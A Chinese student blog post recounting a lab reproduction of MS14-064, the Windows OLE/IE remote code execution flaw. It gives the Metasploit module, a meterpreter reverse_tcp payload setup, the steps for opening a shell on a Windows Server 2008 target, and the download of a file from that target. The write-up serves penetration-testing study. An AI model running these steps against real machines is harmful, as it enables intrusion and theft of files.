• ms14-064漏洞复现


    本博客最先发布于我的个人博客,如果方便,烦请移步恰醋的小屋查看,谢谢您!

    这是我在实验室学习渗透测试的第五个漏洞复现,一个多小时便完成了。学长给的要求只需完成查看靶机信息、在指定位置创建文件夹两项操作,我在看别的博客时发现还可以利用该漏洞窃取文件,因此也自己尝试了以下,写在了博客的最后。

    漏洞介绍

    MS14-064为Windows OLE自动化阵列远程代码执行漏洞。当IE不作访问内存中的对象时,存在远程代码执行漏洞。OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用IE浏览器查看该网站时允许远程执行代码。

    受影响的产品有:

    • Windows Server 2003
    • Windows Server 2008
    • Windows Server 2008 R2
    • Windows Vista
    • Windows XP
    • Windows 7
    • Windows 8
    • Windows 8.1
    • Windows Server 2012
    • Windows Server 2012 R2
    • Windows RT
    • Windows RT 8.1

    实验环境

    攻击机:Kali Linux: 192.168.227.128

    靶机:Windows Server 2008: 192.168.227.130

    复现步骤

    1. 使用msfconsole命令启动msf,搜索ms14-064的漏洞信息:

    2. 使用第一个攻击模块,设置载荷

      use exploit/windows/browser/ms14_064_ole_code_execution # 使用第一个攻击模块
      show payloads # 查看有效的攻击载荷
      set payload windows/meterpreter/reverse_tcp # 设置反弹连接shell
      

      之后使用show options命令查看需要进行的设置。其中,AllowPowershellPrompt、SRVHOST和LHOST需要修改。AllowPowershellPrompt改为true,其余两个改为攻击机IP。设置完成后,使用exploit命令生成恶意网站。

    3. 使用靶机用IE浏览器打开生成的恶意链接

    4. 返回Kali,已经生成了一个连接session了,按一下回车,输入sessions -i 1连接,入侵靶机,打开shell,如果乱码,则使用chcp 65001改变编码,然后输入whoami查看当前用户。(第一次失败了,我推断可能是修改了编码的原因,因为第二次打开shell后没有修改编码,发现成功了,之后又尝试了修改编码后输入whoami,依然不成功)

    5. 尝试在桌面上创建一个名为test的文件夹:

      返回windows server 2008查看,桌面上已经出现了相应的文件夹:

    6. 尝试从靶机窃取文件
      在桌面创建一个名为secret的文件夹:

      使用dir命令查看,存在secret.txt文件,返回meterpreter,使用download命令下载文件:

      下载完成后,在目标目录下查看,存在,说明窃取成功:

  • 相关阅读:
    win10 uwp 弹起键盘不隐藏界面元素
    win10 uwp 存放网络图片到本地
    win10 uwp 存放网络图片到本地
    sublime Text 正则替换
    sublime Text 正则替换
    win10 uwp 绘图 Line 控件使用
    win10 uwp 绘图 Line 控件使用
    AJAX 是什么?
    什么是 PHP SimpleXML?
    PHP XML DOM:DOM 是什么?
  • 原文地址:https://www.cnblogs.com/Alleyn180400524/p/13525440.html
Copyright © 2020-2023  润新知